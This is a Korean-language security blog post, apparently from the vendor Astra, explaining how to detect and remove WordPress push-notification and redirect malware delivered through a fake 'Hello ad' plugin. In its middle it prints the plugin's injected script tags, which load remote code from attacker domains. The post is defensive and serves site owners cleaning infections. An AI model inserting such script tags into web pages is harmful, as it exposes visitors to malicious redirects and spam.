Computer >> 컴퓨터 >  >> 네트워킹 >> 네트워크 보안

WordPress에서 푸시 알림 및 리디렉션 멀웨어를 수정하는 방법

지난 몇 주 동안 Astra의 보안 연구원은 WordPress의 푸시 알림 멀웨어를 추적해 왔습니다. . 이 캠페인은 WordPress 웹사이트에서 진행 중인 리디렉션 캠페인과 결합되었습니다.

리디렉션이 발생하는 몇 가지 악성 도메인에는 inpagepush[.]com, asoulrox[.]com 및 iclickcdn[.]com, justcannabis[.]online, 0.realhelpcompany[.]ga, fast.helpmart[.]ga/가 있습니다. m[.]js?w=085 등

해커는 감염된 WordPress 웹 사이트에 합법적으로 보이는 'Hello ad' 플러그인을 설치하여 이 해킹 캠페인을 더욱 정교하게 만들기 위해 이번에 한 단계 앞서갔습니다. 아래에서 자세히 알아보세요.

관련 가이드 – WordPress 해킹 제거 완료 가이드

푸시 알림 악성 코드의 증상 – WordPress

  1. 저속한 푸시 알림: 방문자에게 웹사이트 방문 시 악성/저속한 푸시 알림이 표시됩니다.

    WordPress에서 푸시 알림 및 리디렉션 멀웨어를 수정하는 방법

  2. 웹사이트 리디렉션: 당사 웹사이트에서 링크를 클릭할 때 악성 페이지로 웹사이트 리디렉션(이상적으로는 WordPress 내의 페이지로 이동해야 함)

    WordPress에서 푸시 알림 및 리디렉션 멀웨어를 수정하는 방법

    inpagepush[.]com, asoulrox[.]com 및 iclickcdn[.]com을 포함하도록 웹사이트가 리디렉션될 수 있는 몇 가지 URL.

  3. 알 수 없는 플러그인 발견: 어떤 경우에는 새로운 악성 플러그인이 'Hello ad'라는 이름으로 WordPress에 추가되었음을 확인했습니다.

  4. 기기별/모바일 전용 바이러스: 우리는 이 맬웨어가 스스로를 아주 잘 숨긴다는 사실을 알게 되었습니다. 항상 푸시 알림을 보내거나 사용자를 리디렉션하지는 않습니다. 동작은 장치에 따라 다릅니다.
    WordPress에서 푸시 알림 및 리디렉션 멀웨어를 수정하는 방법

    때로는 멀웨어가 모바일 장치에서만 푸시 알림을 표시하고 때로는 이전에 웹사이트를 연 사용자가 아닌 새로운 사용자만 리디렉션하는 경우가 있습니다.

악성 Hello Ad 플러그인의 궁금증

이러한 악성 웹사이트에 'Hello ad' 플러그인이 추가되어 사용자를 해커가 제어하는 ​​웹사이트로 리디렉션하는 것을 보았습니다.

이 합법적인 플러그인은 페이지 소스에 다음 악성 자바스크립트 코드를 추가합니다.

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
WordPress에서 푸시 알림 및 리디렉션 멀웨어를 수정하는 방법

이 플러그인에 의해 추가된 코드는 리디렉션을 만드는 데 중요한 역할을 합니다. 그러나 우리는 해커가 새로운 캠페인마다 진화하고 이를 난독화하는 것을 보았습니다.

푸시 알림 악성 코드, Hello Ad 및 리디렉션 해킹 캠페인을 수정하는 방법

  1. 눈에 띄는 곳 확인: 해커는 바이러스/악성코드를 삽입하는 몇 가지 즐겨찾는 위치를 가지고 있습니다. WordPress 수정을 시작할 때 이것들로 시작하는 것이 가장 좋습니다. 다음 파일을 먼저 살펴봐야 합니다.
    • index.php
    • wp-content/themes/{themeName}/functions.php
    • wp-config.php
    • 핵심 테마 파일
    • .htaccess

  2. hello 광고 플러그인 찾기 및 제거: 귀하의 개발자가 생각하거나 과거에 설치했을 수도 있는 이 '정당한 모양' 플러그인을 찾으면 그렇지 않으므로 제거하십시오. 🙂

    관련 가이드 – WordPress 맬웨어 제거
  3. 리디렉션 제거: WordPress 리디렉션 공격이 몇 달 동안 발생했습니다. 악의적인 리디렉션 해킹을 처리하려면 데이터베이스 테이블, 핵심 테마 파일, 때로는 서버의 구성 파일도 조사해야 합니다. 알 수 없는 URL에서 로드된 스크립트/리소스를 찾습니다.

    리디렉션 맬웨어가 널리 퍼져 있으므로 리디렉션 해킹 수정에 대한 자세한 단계별 비디오를 만들었습니다. 해커는 보안 회사의 레이더에 잡히지 않도록 항상 방법을 업데이트하지만 기본 원칙은 동일합니다.


해커는 항상 자신의 방법을 발전시키고 세상에 알려지지 않은 취약점을 악용하고 다양한 악용을 결합하여 해킹을 만듭니다. 해킹을 제거하는 것이 한 부분이지만 해킹되지 않도록 하려면 Astra의 보안 제품군과 같은 보다 영구적인 것이 필요합니다. 🙂